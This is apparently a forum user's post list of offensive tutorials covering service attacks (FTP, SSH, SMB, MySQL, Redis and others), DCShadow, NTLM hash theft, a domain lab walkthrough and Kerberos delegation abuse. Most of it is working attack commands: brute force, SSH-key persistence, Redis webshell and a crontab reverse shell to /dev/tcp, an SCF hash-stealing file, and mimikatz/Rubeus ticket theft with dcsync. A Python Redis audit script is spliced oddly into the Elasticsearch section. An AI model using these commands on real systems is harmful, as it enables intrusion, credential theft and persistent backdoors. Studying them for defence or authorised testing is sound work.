UKhackteam

Everything posted by UKhackteam

  1. Common service vulnerabilities

FTP vulnerabilities

Introduction to the FTP protocol

FTP (File Transfer Protocol) is one of the protocols in the TCP/IP suite. It has two components: an FTP server, which stores files, and an FTP client, which users run to access the resources on the server over the FTP protocol. When developing a website, FTP is usually used to upload pages or programs to the web server; because FTP transfers efficiently, it is also the protocol generally used to move large files across a network. By default FTP uses TCP ports 20 and 21: 20 carries data and 21 carries control information. Whether port 20 is actually used for data depends on the transfer mode. In active mode the data port is 20; in passive mode the server and client negotiate the data port between themselves.

Banner information

The banner reveals the software and version of whatever is running on the remote system, so the version string should be hidden after installing any service.

Anonymous login

msf:
    scanner/ftp/anonymous

Man-in-the-middle sniffing

An attacker can use a sniffer to capture the packets exchanged between server and client and recover the credentials from them, then use those credentials for unauthorized access. As noted above, FTP users authenticate with a plaintext username and password.
FTP brute force tools

hydra:
    hydra -v -L user.txt -P pass.txt ftp://ip

msf:
    auxiliary/scanner/ftp/ftp_login

vsftpd smiley-face backdoor

Version: vsftpd 2.3.4. Backdoor: if the username contains :) the backdoor shell bound to port 6200 is enabled.

Defence

Change the banner in the configuration.
Add an SSL certificate (ssl_enable=YES).
Whitelist the addresses allowed to log in with iptables.
Limit the number of login attempts and login threads.

SSH vulnerabilities

Introduction to SSH

SSH is the abbreviation of Secure Shell, formulated by the IETF Network Working Group. SSH is a security protocol built on the application layer and is a more reliable protocol designed for remote login sessions and other network services. Used correctly, SSH effectively prevents information leakage during remote management and can compensate for weaknesses in the network. SSH was originally a program on UNIX systems but quickly spread to other platforms; SSH clients exist for many platforms, and almost all UNIX platforms, including HP-UX, Linux, AIX, Solaris, Digital UNIX, Irix and others, can run SSH.
Port scanning

nmap:
    nmap -sV -p 22 IP

msf:
    auxiliary/scanner/ssh/ssh_version

Password cracking

msf:
    use auxiliary/scanner/ssh/ssh_login
    set stop_on_success true

SSH user code execution

msf:
    use exploit/multi/ssh/sshexec

Establishing an SSH connection with an RSA key

Configuration:
    ssh-keygen
    cd /home/kali/.ssh
    ls
    cat id_rsa.pub > authorized_keys
    scp msfadmin@ip:/home/msfadmin/.ssh/id_rsa ./
    sudo vim /etc/ssh/sshd_config
        PasswordAuthentication no
    sudo /etc/init.d/ssh restart

Connect:
    ssh -i id_rsa username@ip

Stealing SSH keys

With a meterpreter session obtained, steal the SSH keys:
    use auxiliary/scanner/ssh/ssh_login
    (get the session)
    use post/multi/gather/ssh_creds
    set session 1
    run

SSH key persistence backdoor

With a meterpreter session obtained, leave an SSH key persistence backdoor:
    use auxiliary/scanner/ssh/ssh_login
    (get the session)
    use post/linux/manage/sshkey_persistence
    set session 1
    run

Defence

Change the default port:
    sudo vim /etc/ssh/sshd_config
        Port 22222
    sudo /etc/init.d/ssh restart

Telnet vulnerabilities

Introduction to telnet

The Telnet protocol is a member of the TCP/IP protocol family and is the standard protocol and main method for Internet remote login services. It lets a user carry out work on a remote host from the local computer: the user runs the telnet program on their terminal and connects to the server, then types commands into the telnet program, which run on the server just as if they had been entered at the server's console, so the server can be controlled from the local machine. To start a telnet session you must log in to the server with a username and password. Telnet is a commonly used method for remotely controlling a web server.
Banner information

    /etc/issue.net

msf:
    use auxiliary/scanner/telnet/telnet_version

Changing the default port

    /etc/services
    sudo /etc/init.d/xinetd restart

Stealing credentials by sniffing

Telnet transmits in plaintext and can be sniffed.

Brute force

hydra:
    hydra -v -L user.txt -P pass.txt telnet://IP

msf:
    use auxiliary/scanner/telnet/telnet_login
    set rhosts IP
    set stop_on_success true
    set user_file user.txt
    set pass_file pass.txt
    run

Protecting telnet from brute force attacks

Allow traffic to port 23 from IP address 192.168.1.1:
    sudo iptables -A INPUT -s 192.168.1.1 -p tcp --dport 23 -j ACCEPT

Drop traffic to port 23 from all other IP addresses:
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP

SMTP vulnerabilities

Introduction to SMTP

SMTP is a protocol that provides reliable and efficient email transmission. SMTP is a mail service built on the FTP file transfer service; it is mainly used to deliver mail between systems and to provide notifications about incoming mail. SMTP is independent of any particular transmission subsystem and only requires a reliable, ordered data stream. One important feature of SMTP is its ability to relay mail across networks (SMTP mail relay): with SMTP, mail can be transferred between processes on the same network, or between a process and another network through a relay or gateway.
SMTP commands and return codes

MAIL FROM   Specify the sender address
RCPT TO     Specify a single recipient; there may be several RCPT TO commands, usually following MAIL FROM
VRFY        Ask whether a user/mailbox exists; for security reasons servers often disable this command
EXPN        Verify that a given mailing list exists; also often disabled

Return codes:
250   Requested mail action completed
500   Requested action not taken, mailbox unavailable (for example, the mailbox was not found or is not accessible)

Introduction to Postfix

Postfix is the default mail transfer agent (MTA) on Ubuntu. http://www.postfix.org

SMTP user enumeration

Ubuntu system users are Postfix users. Methods: telnet, smtp-user-enum, msf.

Manually enumerating SMTP users over telnet:
    VRFY ftp
    MAIL FROM:ftp
    RCPT TO:ftp

smtp-user-enum:
    apt-get install smtp-user-enum
    smtp-user-enum -M VRFY -u root -t 202.38.xxx.xxx
    smtp-user-enum -M VRFY -U dic.txt -t 202.38.xxx.xxx
    smtp-user-enum -M RCPT -u bin -t 202.38.xxx.xxx
    smtp-user-enum -M EXPN -u bin -t 202.38.xxx.xxx

msf:
    auxiliary/scanner/smtp/smtp_enum

Brute force

hydra:
    hydra -l msfadmin -P passwd.txt smtp://IP

Samba vulnerabilities

Introduction to Samba

Samba is free software that implements the SMB protocol on Linux and UNIX systems; it consists of server and client programs.

Introduction to SMB

SMB (Server Message Block) is a communication protocol for sharing files and printers on a local area network. It lets different computers on the LAN share files, printers and other resources. SMB is a client/server protocol through which clients access shared file systems, printers and other resources on the server. By running NetBIOS over TCP/IP, Samba can share resources not only with hosts on the local network but with computers anywhere in the world.
SMB information disclosure

msf:
    auxiliary/scanner/smb/smb_version

nmap:
    nmap -sV -p 445 IP
    nmap -sV -v -p 445 --script=smb-vuln* IP

nmblookup

nmblookup queries NetBIOS names and maps them to IP addresses using NetBIOS-over-TCP/IP queries. Its options let you direct name queries at a specific broadcast area or a specific machine; all queries go over UDP. nmblookup is useful for enumerating the domain/workgroup and MAC addresses:
    nmblookup -A 192.168.1.139

nbtscan

Scans for NetBIOS name servers on a local or remote TCP/IP network, which is the first step in finding open shares. It works across an entire subnet rather than a single IP:
    nbtscan 192.168.1.1/24

SMBMap

SMBMap lets users enumerate Samba shares across an entire domain: list shares, share permissions and share contents, upload and download files, automatically download files whose names match a pattern, and even execute remote commands. It is designed to simplify the search for potentially sensitive data in large networks.
    smbmap -H 192.168.1.139
    smbmap -H 192.168.1.139 -u msfadmin -p msfadmin

Brute force

hydra:
    hydra -L user.txt -P pass.txt -v smb://ip

Command execution

    search smb 3.0.20
    use exploit/multi/samba/usermap_script

Zookeeper

Introduction to Zookeeper

Zookeeper is a distributed service framework and a sub-project of Apache Hadoop. It is mainly used to solve data management problems commonly met in distributed applications, such as unified naming, state synchronisation, cluster management and management of distributed application configuration.

Environment setup

    wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz
    tar -xzvf zookeeper-3.4.14.tar.gz
    cd zookeeper-3.4.14
    mv conf/zoo_sample.cfg conf/zoo.cfg
    bin/zkServer.sh start

Unauthorized access

Zookeeper has no password set by default.
With no access control in place, an attacker can obtain a large amount of sensitive information about the system by sending the envi command, including the system name and the Java environment. Zookeeper listens on port 2181 by default.

    netstat -an | grep 2181
    nmap -sV -p 2181 IP

    nc IP 2181

Four-letter commands:
envi   Print detailed information about the service environment
stat   List statistics about performance and connected clients
ruok   Test whether the server is running in a non-error state
reqs   List outstanding requests
dump   List outstanding sessions and ephemeral nodes

Graphical tool: ZooInspector

MySQL vulnerabilities

Introduction to MySQL

MySQL is one of the most widely used databases in the world; many well-known companies and sites use MySQL as their database. Many architectures use MySQL as the database management system, such as LAMP and WAMP.

MySQL information gathering

Version information:
    nmap -sV -p 3306 IP
msf:
    use auxiliary/scanner/mysql/mysql_version

Other related information:
    use auxiliary/admin/mysql/mysql_enum

MySQL password cracking

hydra:
    hydra -L user.txt -P password.txt -v mysql://IP

msf:
    use auxiliary/scanner/mysql/mysql_login

MySQL exploitation

MySQL authentication bypass (CVE-2012-2122)
https://secists.org/oss-sec/2012/q2/493

The return value of memcmp() is expected to lie within [-128, 127]. The two strings are compared character by character; when a differing character is found, the difference of the two characters is returned. When memcmp() returns 0, check_scramble() passes authentication.

Exploitation

msf:
    use auxiliary/scanner/mysql/mysql_authbypass_hashdump

Linux shell:
    for i in `seq 1 1000`; do mysql -uroot -pwrong -h IP -P3306; done

Redis

Introduction to Redis

Redis is one of what people usually call non-relational databases. It is an open source, log-structured key-value database written in ANSI C, supports network access and persistence, and provides APIs in many languages. Like memcached, Redis keeps data cached in memory for efficiency.
However, Redis periodically writes updated data to disk or appends modification operations to a log file, and on this basis implements master-slave synchronisation.

Redis unauthorized access vulnerability

The default configuration listens on port 6379 with no password set, which allows unauthorized reading and writing of Redis data.

Writing a webshell into the web directory:
    config set dir /var/www/html
    config set dbfilename webshell.php
    set webshell '<?php phpinfo(); ?>'
    save

Tip for writing a shell with Redis when the database is too large:
    <?php
    set_time_limit(0);
    $fp=fopen('webshell.php','w');
    fwrite($fp,'<?php @eval($_POST[1]);?>');
    exit();
    ?>

Writing an SSH public key:
    ssh-keygen -t rsa
    cd .ssh
    (echo -e '\n\n'; cat id_rsa.pub; echo -e '\n\n') > 1.txt
    cat 1.txt | redis-cli -h ip -x set payload
    config set dir /root/.ssh
    config set dbfilename authorized_keys
    save

Writing a crontab:
    redis-cli -h 192.168.0.104
    set xxx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.0.104/4444 0>&1\n\n"
    config set dir /var/spool/cron
    config set dbfilename root
    save

RCE through Redis master-slave replication
https://geekby.xyz/2019/07/15/redis-ji-yu-zhu-cong-fu-zhi-de-rce-li-yong-fang-shi/

Zabbix vulnerabilities

Introduction to Zabbix

Zabbix is a network monitoring and management system developed by Alexei Vladishev, based on a server/client architecture. It can monitor the status of network services, servers, network equipment and so on, and stores its data in database back-ends such as MySQL, PostgreSQL, SQLite, Oracle and IBM DB2. The server side is written in C and the web management front end in PHP. Zabbix can monitor in several ways: with simple checks that need no client installed, or with checks based on protocols such as SMTP or HTTP. After installing the Zabbix Agent on UNIX or Windows clients it can monitor CPU load, network usage, disk capacity and other states.
Even without the Agent installed on the monitored object, Zabbix can monitor the target via SNMP, TCP, ICMP, IPMI, SSH and telnet. Zabbix also includes various item alert functions such as XMPP.

Zabbix SQL injection vulnerability
https://geekby.xyz/2019/03/01/zabbix-latest.php-sql-zhu-ru-lou-dong/

Zabbix command execution

If the administrator used a weak password or the default username and password when installing and configuring Zabbix (for example Admin/zabbix), user authentication on the Zabbix server is useless. An attacker can create system.run[command,] monitoring items to execute commands and even obtain a shell on the server for activities such as mining.
https://www.jianshu.com/p/675b6385b7c0

Elasticsearch vulnerabilities

Introduction to Elasticsearch

Elasticsearch is a distributed, highly scalable, near-real-time search and data analysis engine. It makes it easy to search, analyse and explore large amounts of data, and taking full advantage of its horizontal scalability makes data more valuable in production environments. Elasticsearch works roughly as follows: the user submits data to the Elasticsearch database, which passes it through a tokenizer and stores the resulting terms; when the user searches, the results are scored by weight and ranked accordingly.
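The Redis unauthorized-access check and the CONFIG SET dir/dbfilename, SET, SAVE file-write sequence described in the Redis section above, as an added Python example that is not part of the original post. It speaks RESP, the protocol redis-cli uses on the wire, so it shows what the commands actually send, why the SSH-key and crontab payloads are padded with blank lines, and how to tell an open instance from one that requires AUTH. All server replies and the two redis.conf texts are constructed samples; the function names are my own, and nothing is contacted over the network.

```python
"""RESP helpers and an unauthorized-access check for Redis (added example).

All 'server replies' and config texts here are constructed samples standing in
for a real instance on port 6379; nothing is contacted.
"""

def encode_command(*args):
    """Serialize a command as a RESP array, as redis-cli sends it. Binary-safe, so a
    payload that itself contains newlines (the '\\n\\n'-padded SSH key or crontab
    line written via 'redis-cli -x set') travels as one bulk string."""
    parts = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a if isinstance(a, bytes) else str(a).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(parts)


def parse_reply(data):
    """Parse a single RESP reply into (kind, value). Handles simple strings,
    errors, integers and bulk strings; other types raise ValueError."""
    if not data.endswith(b"\r\n"):
        raise ValueError("incomplete reply")
    kind, body = data[:1], data[1:-2]
    if kind == b"+":
        return ("status", body.decode())
    if kind == b"-":
        return ("error", body.decode())
    if kind == b":":
        return ("integer", int(body))
    if kind == b"$":
        length, _, rest = body.partition(b"\r\n")
        n = int(length)
        return ("bulk", None if n == -1 else rest[:n])
    raise ValueError("unsupported reply type %r" % kind)


def classify_access(info_reply):
    """Interpret the reply to an unauthenticated INFO: open instance (the page's
    default 6379/no-password case), password required, or command renamed away."""
    kind, value = parse_reply(info_reply)
    if kind == "error" and value.startswith("NOAUTH"):
        return "requires-auth"
    if kind == "error" and "unknown command" in value.lower():
        return "command-disabled"
    if kind == "bulk" and value is not None:
        return "unauthenticated-access"
    return "unknown"


def write_file_commands(directory, filename, key, payload):
    """Wire bytes for the page's CONFIG SET dir / dbfilename, SET, SAVE sequence.
    The payload is padded with blank lines because the RDB file wraps the value in
    a binary header and trailer; the padding keeps the key/cron line on its own
    line so line-oriented readers (sshd, cron) still parse it."""
    padded = b"\n\n" + payload + b"\n\n"
    return [
        encode_command("CONFIG", "SET", "dir", directory),
        encode_command("CONFIG", "SET", "dbfilename", filename),
        encode_command("SET", key, padded),
        encode_command("SAVE"),
    ]


def audit_redis_conf(conf_text):
    """Flag redis.conf settings that make the attack above possible."""
    settings = {}
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition(" ")
        settings.setdefault(name.lower(), []).append(value.strip())
    findings = []
    if "requirepass" not in settings:
        findings.append("no requirepass: anyone reaching the port has full access")
    if "bind" not in settings or any(v.startswith("0.0.0.0") for v in settings["bind"]):
        findings.append("listening on all interfaces")
    if settings.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode disabled")
    renamed = {v.split()[0].lower() for v in settings.get("rename-command", []) if v}
    if "config" not in renamed:
        findings.append("CONFIG not renamed: dir/dbfilename can be retargeted")
    return findings


# Constructed configurations: the exposed default beside a hardened one.
WEAK_CONF = "port 6379\nbind 0.0.0.0\nprotected-mode no\n"
HARDENED_CONF = ("port 6379\nbind 127.0.0.1\nprotected-mode yes\n"
                 "requirepass Str0ngPassHere\nrename-command CONFIG \"\"\n")

if __name__ == "__main__":
    print(classify_access(b"-NOAUTH Authentication required.\r\n"))
    print(audit_redis_conf(WEAK_CONF))
```

The audit deliberately treats a missing rename-command for CONFIG as a finding even when requirepass is set: the write-file trick only needs CONFIG SET, so once a password is guessed or leaked it is the one command that turns a data-store compromise into file writes on the host.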
  2. DCShadow attack

On January 24, 2018, Benjamin Delpy (author of Mimikatz) and Vincent Le Toux unveiled a new attack technique against Active Directory domains, DCShadow, at the BlueHat IL conference. With domain administrator privileges, an attacker can create a fake domain controller and replicate preset objects or object attributes to the running domain controllers. DCSync copies things out of the domain controller; DCShadow copies data into the domain controller.

Luc Delsalle verified and described this technique in detail and analysed its weaknesses and the countermeasures for red/blue team confrontation. Judging from the functionality DCShadow currently exposes, it can only be used for hidden backdoors in red/blue confrontation. But DCShadow clarified and implemented for the first time the minimum set of requirements for faking a DC, which is a very significant contribution. Many earlier attack methods, such as MS15-011 and MS15-014, got stuck because they could not forge a domain controller. With DCShadow as a foundation, I believe many new attack methods will follow.

Process

According to Luc Delsalle's description, a DCShadow attack has three main steps:
1. Register a fake DC in the Active Directory of the target domain;
2. Get the forged DC recognised by the other DCs so that it can take part in domain replication;
3. Force domain replication, so that the specified new object or modified object attributes are synchronised to the other DCs.

Registering a forged DC

For a machine to register as a DC in the domain, an object of class nTDSDSA must be registered in the domain's Active Directory, at
CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=adsec,DC=com
The adsec.com domain has three domain controllers: LABDC01, RESDC01 and WIN2016-DC01. The one marked in red is the domain controller of our experimental environment.
The machine we tested from is Win7X86cn04. If the test succeeds, a new nTDSDSA class object is created. Looking at the security descriptor of CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=adsec,DC=com, it can be seen that domain administrator privileges are required for write permission. Therefore, launching a DCShadow attack requires domain administrator permissions; for the experiment, however, we can cheat a little to make things easier, for example by granting full permissions to an ordinary user, who can then modify it as well.

DCShadow source code:

Getting the registered DC recognised by the other DCs so that it can take part in domain replication

For a newly registered DC to be recognised by the other DCs and take part in domain replication, the following must be met:
1. The forged DC has authentication credentials and can authenticate to the domain, that is, it has an account in the domain; a machine account can be used. In the experimental environment this is WIN7X86CN04$.
2. The forged DC's account must be one that the other DCs can authenticate to. This is achieved by adding SPNs to WIN7X86CN04$. The key is which SPNs need to be added; one of DCShadow's major contributions was finding the minimum set, which needs only two: the DRS service (GUID E3514235-4B06-11D1-AB04-00C04FC2DCD2) and the GC (Global Catalog) service.
3. When running the DRS service, at least four RPC interfaces must be implemented: IDL_DRSBind, IDL_DRSUnbind, IDL_DRSGetNCChanges and IDL_DRSUpdateRefs, so that the other DCs can fetch the data to be replicated over RPC. The latest version of Mimikatz has these four interfaces integrated.

Forcing immediate domain replication

The process normally responsible for domain replication and synchronisation is the KCC. By default it checks every 15 minutes and initiates replication if needed.
You can also use repadmin, the system tool that ships with Windows domain controllers, which calls the DRSReplicaAdd interface to force domain replication immediately. DCShadow forces immediate domain replication by calling the DRSReplicaAdd function itself.

Attack reproduction

Pay attention to the firewall settings during the attack.
  3. Obtaining NTLM

1 Background

1.1 Where NTLM hashes are stored:
1. The system database SAM (Security Account Manager)
2. The DIT database
3. The memory cache

1.2 How NTLM hashes are obtained:
1. From the SAM
2. From memory
3. From the DIT database
4. WCE, PWDUMP, MIMIKATZ…

1.3 The form of NTLM
aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
LMHash (not saved by default since Windows 2008 R2)
NTHash
NetHash: the type mainly obtained here

1.4 Remote acquisition (theft):
1. Responder
2. HTTP + SMB
3. SCF + SMB
4. SQL + SMB

ADV170014 NTLM SSO

In October 2017, on Patch Tuesday, Microsoft released security advisory ADV170014, which describes a weakness in the NTLM authentication scheme that a malicious attacker can use to steal hashes. The attacker simply needs to place a malicious SCF file in a publicly accessible Windows folder. Once the file is placed in the folder, it is executed by a mysterious bug, collects the target's NTLM password hash and sends it to a server configured by the attacker. Targets with shared folders that are not password-protected are very common: in offices, schools, hospitals and most Windows environments, people share music, photos and documents through shared folders.

Attack scenario

Non-genuine systems may not have this setting. Microsoft introduced SCF files in Windows 3.11. SCF files are plain text files that direct Windows File Explorer to perform some basic tasks.

    [Shell]
    Command=2
    IconFile=\\192.168.1.2\sharetest.ico
    [Taskbar]
    Command=ToggleDesktop
  4. VulnStack ATT&CK 2 range

Environment

Information gathering

nmap port scan:

    PORT      STATE SERVICE       VERSION
    80/tcp    open  http          Microsoft IIS httpd 7.5
    | http-methods:
    |   Supported Methods: OPTIONS TRACE GET HEAD POST
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/7.5
    |_http-title: Site doesn't have a title.
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds  Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
    1433/tcp  open  ms-sql-s      Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
    | ms-sql-ntlm-info:
    |   Target_Name: DE1AY
    |   NetBIOS_Domain_Name: DE1AY
    |   NetBIOS_Computer_Name: WEB
    |   DNS_Domain_Name: de1ay.com
    |   DNS_Computer_Name: WEB.de1ay.com
    |   DNS_Tree_Name: de1ay.com
    |_  Product_Version: 6.1.7601
    | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
    | Issuer: commonName=SSL_Self_Signed_Fallback
    | Public Key type: rsa
    | Public Key bits: 1024
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2020-04-18T03:37:19
    | Not valid after:  2050-04-18T03:37:19
    | MD5:   83a6 3f23 de4f e053 4224 f66c a547 3223
    |_SHA-1: 0aad 0382 de96 c9da 3990 3014 360c 7f31 bf78 a3df
    |_ssl-date: 2020-04-18T06:12:57+00:00; -2s from scanner time.
    3389/tcp  open  ms-wbt-server Microsoft Terminal Services
    | rdp-ntlm-info:
    |   Target_Name: DESKTOP-DUNPKQ9
    |   NetBIOS_Domain_Name: DESKTOP-DUNPKQ9
    |   NetBIOS_Computer_Name: DESKTOP-DUNPKQ9
    |   DNS_Domain_Name: DESKTOP-DUNPKQ9
    |   DNS_Computer_Name: DESKTOP-DUNPKQ9
    |   Product_Version: 10.0.17763
    |_  System_Time: 2020-04-18T06:12:19+00:00
    | ssl-cert: Subject: commonName=DESKTOP-DUNPKQ9
    | Issuer: commonName=DESKTOP-DUNPKQ9
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-02-23T21:21:14
    | Not valid after:  2020-08-24T21:21:14
    | MD5:   5cb3 a3dd 4a5e eb67 80d5 8f39 633f d11b
    |_SHA-1: 9694 4630 239e d821 3658 976c 40a1 6d3b d9b4 e80f
    |_ssl-date: 2020-04-18T06:12:57+00:00; -2s from scanner time.
    7001/tcp  open  http          Oracle WebLogic Server (Servlet 2.5; JSP 2.1)
    |_http-title: Error 404--Not Found
    49152/tcp open  msrpc         Microsoft Windows RPC
    49153/tcp open  msrpc         Microsoft Windows RPC
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: -1h08m35s, deviation: 3h01m23s, median: -2s
    | ms-sql-info:
    |   192.168.3.242:1433:
    |     Version:
    |       name: Microsoft SQL Server 2008 R2 SP2
    |       number: 10.50.4000.00
    |       Product: Microsoft SQL Server 2008 R2
    |       Service pack level: SP2
    |       Post-SP patches applied: false
    |_    TCP port: 1433
    | smb-os-discovery:
    |   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_server_2008:sp1
    |   Computer name: WEB
    |   NetBIOS computer name: WEB\x00
    |   Domain name: de1ay.com
    |   Forest name: de1ay.com
    |   FQDN: WEB.de1ay.com
    |_  System time: 2020-04-18T14:12:22+08:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-04-18T06:12:20
    |_  start_date: 2020-04-18T03:37:46

WebLogic was found on port 7001. Visiting http://192.168.3.242:7001/console shows version 10.3.6.0. Scanning the WebLogic server with weblogicScanner found CVE-2019-2725.

Exploitation

WebLogic

Upload a webshell for subsequent operations. For the WebLogic upload path, see https://www.cnblogs.com/sstfy/p/10350915.html

Behinder (Ice Scorpion) connection:

Upload the CS trojan:

Execute:

It turned out to be a domain user, so check the IP with ipconfig: the machine has two network cards, and the intranet is the 10.10.10.xx segment.

Intranet penetration

Dump passwords

Privilege escalation

Use MS14-058 to escalate to SYSTEM to make further operations easier:

Domain information gathering

Check the domain name
Check hosts in the domain
Check users in the domain
Check the domain controller
Check domain admins

Lateral movement

Use PsExec to move laterally to the DC:

Backdoor

Information gathering on the domain controller

Dump the krbtgt hash:

Create a golden ticket

Before injecting the ticket:

After injecting the ticket:
  5. Attacks based on domain delegation

1 Definitions related to domain delegation

1.1 Definition

Identity delegation is a feature of Active Directory Federation Services (AD FS) that allows administrator-specified accounts to impersonate users. The account that impersonates the user is called the delegate. This delegation capability is critical for many distributed applications for which there is a series of access control checks that must be made sequentially for each application, database, or service that is in the authorization chain for the originating request. Many real-world scenarios exist in which a Web application "front end" must retrieve data from a more secure "back end", such as a Web service that is connected to a Microsoft SQL Server database.

Domain delegation is an application model often deployed in large networks. It brings great convenience to multi-hop authentication but also great security risk: delegation can be used to obtain domain administrator permissions and even to plant deeply hidden backdoors. Domain delegation means delegating a domain user's permissions to a service account, so that the service account can act within the domain with that user's rights.

Two kinds of accounts in the domain can be delegated: host accounts (net computer) and service accounts (net user) to which an SPN has been added manually with setspn. The examples below, both unconstrained and constrained, use host accounts, because an environment that delegates with a host account is easy to set up and easy to understand; from the point of view of attacking delegation, however, service accounts and host accounts are equivalent.

A service account is a type of user in the domain: the account used by a server to run a service, which joins the domain when the service runs. For example, when MS SQL Server is installed it automatically registers the service account SqlServiceAccount in the domain. This type of account cannot be used for interactive logon.
After an ordinary domain user jack authenticates to the front-end web service with Kerberos, the service account websvc that runs the web service impersonates jack and continues to authenticate to the back-end server with Kerberos, thereby obtaining jack's access rights on the back-end server. This is single- or multi-hop Kerberos authentication within the domain.

1.2 Process

Domain user jack authenticates with Kerberos to access the web server;
The web service runs as the websvc service account, and websvc requests a ticket for user jack from the KDC;
The KDC checks websvc's delegation attributes and, if set, returns a forwardable TGT for jack;
After receiving jack's TGT, websvc uses it to request from the KDC a service ticket (ST) for the file server;
The KDC checks websvc's delegation attributes; if set and the file service is in the allowed list, it returns an ST authorising jack to access the file service;
Once websvc has received jack's ST it can access the file service, completing multi-hop authentication.

1.3 Types of delegation

There are three main forms of delegation in the domain:
The first is unconstrained delegation: the service account can obtain a user's TGT, so it can use the TGT to impersonate that user to any service.
The second is constrained delegation, which is the Kerberos protocol extension S4U2Proxy: the service account can only obtain a user's ST, so it can only impersonate the user to specific services.

2 Unconstrained delegation

2.1 Principle

If service account B of service A is configured for unconstrained delegation, then when user C accesses service A through Kerberos authentication, the KDC checks the attributes of service account B.
When it finds that unconstrained delegation is set, the KDC places user C's TGT inside the ST. In this way B obtains user C's TGT while verifying the ST, and can then impersonate user C to access any service. After delegation is enabled there is an additional flag in the account's userAccountControl attribute: WORKSTATION_TRUSTED_FOR_DELEGATION. Configuring unconstrained delegation requires the SeEnableDelegation privilege, which is usually granted only to domain administrators.

2.2 In practice

2.2.1 Finding unconstrained delegation

2.2.1.1 adfind

Query hosts with unconstrained delegation:
    AdFind.exe -b "DC=pentest,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

Query users with unconstrained delegation:
    AdFind.exe -b "DC=pentest,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

2.2.1.2 PowerView

Note: PowerSploit dev branch.

Query users configured with unconstrained delegation:
    Get-NetUser -Unconstrained -Domain pentest.com

Query hosts configured with unconstrained delegation:
    Get-DomainComputer -Unconstrained -Domain pentest.com

2.2.1.3 ldapsearch

Requires the account and password of any domain user.

Query machines with unconstrained delegation:
    ldapsearch -LLL -x -H ldap://172.16.147.130:389 -D '[email protected]' -w '123456bY' -b dc=pentest,dc=com '(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

Query users with unconstrained delegation:
    ldapsearch -LLL -x -H ldap://172.16.147.130:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

2.2.2 Exploiting unconstrained delegation

2.2.2.1 Impersonating an administrator's access

Before the experiment it is recommended to clear the tickets in memory; in mimikatz:
    kerberos::purge

Simulate the administrator accessing the SMB service of the unconstrained-delegation machine:
    net use \\win7\c$

Go back to the unconstrained-delegation machine and check the tickets (partial screenshot):
    privilege::debug
    sekurlsa::tickets

The TGT was intercepted; export the tickets with:
    sekurlsa::tickets /export

At this point our access to the domain controller is denied. Then inject the ticket into memory with kerberos::ptt <ticket file> in mimikatz, and access succeeds. To execute commands, connect to the domain controller remotely with WinRM:
    Enter-PSSession -ComputerName DC

2.2.2.2 Spooler printer bug

In real engagements, simply waiting for an administrator to actively connect to the unconstrained-delegation machine wastes time. Unconstrained delegation combined with the Spooler printer service can instead force a specified host to connect.

Principle: an old but default-enabled method of the Windows Print System Remote Protocol (MS-RPRN), RpcRemoteFindFirstPrinterChangeNotification(Ex), lets any domain user force any computer running the Spooler service to authenticate, via Kerberos or NTLM, to a target chosen by the attacker.

POC: https://github.com/leechristensen/SpoolSample

Send a request to the DC's Spooler service, forcing it to authenticate to win7:
    SpoolSample.exe DC win7

Rubeus can be used to monitor Event ID 4624 so that the DC's TGT is captured as soon as it logs in, checking every second for logons from DC$ (local administrator permission is required):
    Rubeus.exe monitor /interval:1 /filteruser:DC$

Note: the TGT captured by Rubeus is base64 encoded, but there is no need to decode it; Rubeus can inject a base64 ticket directly into memory:
    Rubeus.exe ptt /ticket:base64

After obtaining the TGT and injecting it into the current session with PTT, dcsync can be used to export the hashes of all users from the domain controller, and the krbtgt hash can then be used to create a golden ticket.
kerberos::ptt xxxx.kirbi
lsadump::dcsync /domain:test.local /all /csv

3 Constrained delegation

3.1 Principle

Because of the insecurity of unconstrained delegation, Microsoft introduced constrained delegation in Windows Server 2003, extending the Kerberos protocol with S4U. S4U has two sub-protocols, Service for User to Self (S4U2Self) and Service for User to Proxy (S4U2Proxy), both of which let a service request tickets from the KDC on behalf of a user. S4U2Self lets a service request a Kerberos service ticket (ST) to itself; S4U2Proxy lets it request an ST to another service in the user's name, and constrained delegation limits the scope of the S4U2Proxy extension.

Request flow for S4U2Self and S4U2Proxy (figure from the Microsoft documentation). Steps 1-4 are the S4U2Self request and steps 5-10 the S4U2Proxy request:

1. The user makes a request to service1. The user is authenticated, but service1 has no authorization data for the user; typically this is because authentication was done by a means other than Kerberos.
